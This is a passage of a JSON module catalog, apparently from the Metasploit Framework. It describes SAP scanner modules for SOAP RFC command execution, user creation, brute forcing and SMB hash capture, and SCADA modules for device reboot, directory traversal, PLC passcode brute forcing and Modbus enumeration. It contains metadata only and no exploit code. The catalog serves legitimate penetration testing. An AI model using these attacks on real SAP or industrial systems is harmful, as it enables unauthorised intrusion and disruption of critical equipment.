"description": "This module simply attempts to output a list of available\n logfiles and developer tracefiles through the SAP Management\n Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_startprofile": {
"name": "SAP Management Console getStartProfile",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_startprofile",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to access the SAP startup profile\n through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_startprofile",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_version": {
"name": "SAP Management Console Version Detection",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to identify the version of SAP\n through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_router_info_request": {
"name": "SAPRouter Admin Request",
"full_name": "auxiliary/scanner/sap/sap_router_info_request",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Mariano Nunez",
"nmonkee"
],
"description": "Display the remote connection table from a SAPRouter.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/",
"URL-http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm",
"URL-http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf"
],
"platform": "",
"arch": "",
"rport": 3299,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_router_info_request",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_router_portscanner": {
"name": "SAPRouter Port Scanner",
"full_name": "auxiliary/scanner/sap/sap_router_portscanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bruno Morisson <bm@integrity.pt>",
"nmonkee"
],
"description": "This module allows for mapping ACLs and identify open/closed ports accessible\n on hosts through a saprouter.",
"references": [
"URL-http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm",
"URL-http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm",
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/",
"URL-http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf",
"URL-http://scn.sap.com/docs/DOC-17124"
],
"platform": "",
"arch": "",
"rport": "3299",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_router_portscanner.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_router_portscanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_service_discovery": {
"name": "SAP Service Discovery",
"full_name": "auxiliary/scanner/sap/sap_service_discovery",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "Scans for listening SAP services.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_service_discovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_smb_relay": {
"name": "SAP SMB Relay Abuse",
"full_name": "auxiliary/scanner/sap/sap_smb_relay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexey Tyurin",
"nmonkee"
],
"description": "This module exploits provides several SMB Relay abuse through different SAP\n services and functions. The attack is done through specially crafted requests\n including a UNC Path which will be accessing by the SAP system while trying to\n process the request. In order to get the hashes the auxiliary/server/capture/smb\n module can be used.",
"references": [
"URL-http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/",
"URL-https://service.sap.com/sap/support/notes/1597066"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_smb_relay",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_bapi_user_create1": {
"name": "SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation",
"full_name": "auxiliary/scanner/sap/sap_soap_bapi_user_create1",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the BAPI_USER_CREATE1 function, through the SOAP\n /sap/bc/soap/rfc service, for creating/modifying users on a SAP.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_bapi_user_create1",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_brute_login": {
"name": "SAP SOAP Service RFC_PING Login Brute Forcer",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_brute_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module attempts to brute force SAP username and passwords through the\n /sap/bc/soap/rfc SOAP service, using RFC_PING function.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_brute_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the\n use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/",
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module makes use of the SXPG_COMMAND_EXEC Remote Function Call, through the\n use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/",
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_eps_get_directory_listing": {
"name": "SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver EPS_GET_DIRECTORY_LISTING function, on the\n SAP SOAP RFC Service, to check for remote directory existence and get the number\n of entries on it. The module can also be used to capture SMB hashes by using a fake\n SMB share as DIR.",
"references": [
"URL-http://labs.mwrinfosecurity.com"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_eps_get_directory_listing",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_pfl_check_os_file_existence": {
"name": "SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"lexey Tyurin",
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver PFL_CHECK_OS_FILE_EXISTENCE function, on\n the SAP SOAP RFC Service, to check for files existence on the remote file system.\n The module can also be used to capture SMB hashes by using a fake SMB share as\n FILEPATH.",
"references": [
"OSVDB-78537",
"BID-51645",
"URL-http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_ping": {
"name": "SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the RFC_PING function, through the\t/sap/bc/soap/rfc\n SOAP service, to test connectivity to remote RFC destinations.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_ping",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_read_table": {
"name": "SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_read_table",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the RFC_READ_TABLE Function to read data from tables using\n the /sap/bc/soap/rfc SOAP service.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_read_table",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_rzl_read_dir": {
"name": "SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexey Tyurin",
"nmonkee"
],
"description": "This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL function, on the SAP\n SOAP RFC Service, to enumerate directory contents. It returns only the first 32\n characters of the filename since they are truncated. The module can also be used to\n capture SMB hashes by using a fake SMB share as DIR.",
"references": [
"OSVDB-92732",
"URL-http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_rzl_read_dir",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_susr_rfc_user_interface": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP\n /sap/bc/soap/rfc service, for creating/modifying users on a SAP.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_sxpg_call_system_exec": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the\n use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in\n the SM69 transaction.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_sxpg_command_exec": {
"name": "SAP SOAP RFC SXPG_COMMAND_EXECUTE",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through\n the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured\n in the SM69 transaction.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_sxpg_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_system_info": {
"name": "SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_system_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee",
"ChrisJohnRiley"
],
"description": "This module makes use of the RFC_SYSTEM_INFO Function to obtain the operating\n system version, SAP version, IP address and other information through the use of\n the /sap/bc/soap/rfc SOAP service.",
"references": [
"CVE-2006-6010",
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_system_info",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_th_saprel_disclosure": {
"name": "SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure",
"full_name": "auxiliary/scanner/sap/sap_soap_th_saprel_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module attempts to identify software, OS and DB versions through the SAP\n function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_th_saprel_disclosure",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_web_gui_brute_login": {
"name": "SAP Web GUI Login Brute Forcer",
"full_name": "auxiliary/scanner/sap/sap_web_gui_brute_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module attempts to brute force SAP username and passwords through the SAP Web\n GUI service. Default clients can be\ttested without needing to set a CLIENT. Common\n and default user/password combinations can be tested just setting the DEFAULT_CRED\n variable to true. The MSF_DATA_DIRECTORY/wordlists/sap_default.txt path store\n stores these default combinations.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_web_gui_brute_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/digi_addp_reboot": {
"name": "Digi ADDP Remote Reboot Initiator",
"full_name": "auxiliary/scanner/scada/digi_addp_reboot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Reboot Digi International based equipment through the ADDP service",
"references": [
"URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html",
"URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29"
],
"platform": "",
"arch": "",
"rport": 2362,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_addp_reboot",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/scada/digi_addp_version": {
"name": "Digi ADDP Information Discovery",
"full_name": "auxiliary/scanner/scada/digi_addp_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover host information through the Digi International ADDP service",
"references": [
"URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html",
"URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29"
],
"platform": "",
"arch": "",
"rport": 2362,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_addp_version",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/scada/digi_realport_serialport_scan": {
"name": "Digi RealPort Serial Server Port Scanner",
"full_name": "auxiliary/scanner/scada/digi_realport_serialport_scan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Identify active ports on RealPort-enabled serial servers.",
"references": [
"URL-http://www.digi.com/pdf/fs_realport.pdf",
"URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers"
],
"platform": "",
"arch": "",
"rport": 771,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_realport_serialport_scan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/digi_realport_version": {
"name": "Digi RealPort Serial Server Version",
"full_name": "auxiliary/scanner/scada/digi_realport_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect serial servers that speak the RealPort protocol.",
"references": [
"URL-http://www.digi.com/pdf/fs_realport.pdf",
"URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers"
],
"platform": "",
"arch": "",
"rport": 771,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_realport_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/indusoft_ntwebserver_fileaccess": {
"name": "Indusoft WebStudio NTWebServer Remote File Access",
"full_name": "auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Indusoft WebStudio.\n The vulnerability exists in the NTWebServer component and allows to read arbitrary\n remote files with the privileges of the NTWebServer process. The module has been\n tested successfully on Indusoft WebStudio 6.1 SP6.",
"references": [
"CVE-2011-1900",
"OSVDB-73413",
"BID-47842",
"URL-http://www.indusoft.com/hotfixes/hotfixes.php"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/koyo_login": {
"name": "Koyo DirectLogic PLC Password Brute Force Utility",
"full_name": "auxiliary/scanner/scada/koyo_login",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate to a locked Koyo DirectLogic PLC.\n The PLC uses a restrictive passcode, which can be A0000000 through A9999999.\n The \"A\" prefix can also be changed by the administrator to any other character,\n which can be set through the PREFIX option of this module.\n\n This module is based on the original 'koyobrute.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 28784,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/koyo_login.rb",
"is_install_path": true,
"ref_name": "scanner/scada/koyo_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/modbus_findunitid": {
"name": "Modbus Unit ID and Station ID Enumerator",
"full_name": "auxiliary/scanner/scada/modbus_findunitid",
"rank": 300,
"disclosure_date": "2012-10-28",
"type": "auxiliary",
"author": [
"EsMnemon <esm@mnemonic.no>"
],
"description": "Modbus is a cleartext protocol used in common SCADA systems, developed\n originally as a serial-line (RS232) async protocol, and later transformed\n to IP, which is called ModbusTCP. default tcp port is 502.\n\n This module sends a command (0x04, read input register) to the modbus endpoint.\n If this command is sent to the correct unit-id, it returns with the same function-id.\n if not, it should be added 0x80, so that it sys 0x84, and an exception-code follows\n which do not interest us. This does not always happen, but at least the first 4\n bytes in the return-packet should be exact the same as what was sent.\n\n You can change port, ip and the scan-range for unit-id. There is also added a\n value - BENICE - to make the scanner sleep a second or more between probes. We\n have seen installations where scanning too many too fast works like a DoS.",
"references": [
"URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx",
"URL-http://en.wikipedia.org/wiki/Modbus:TCP"
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
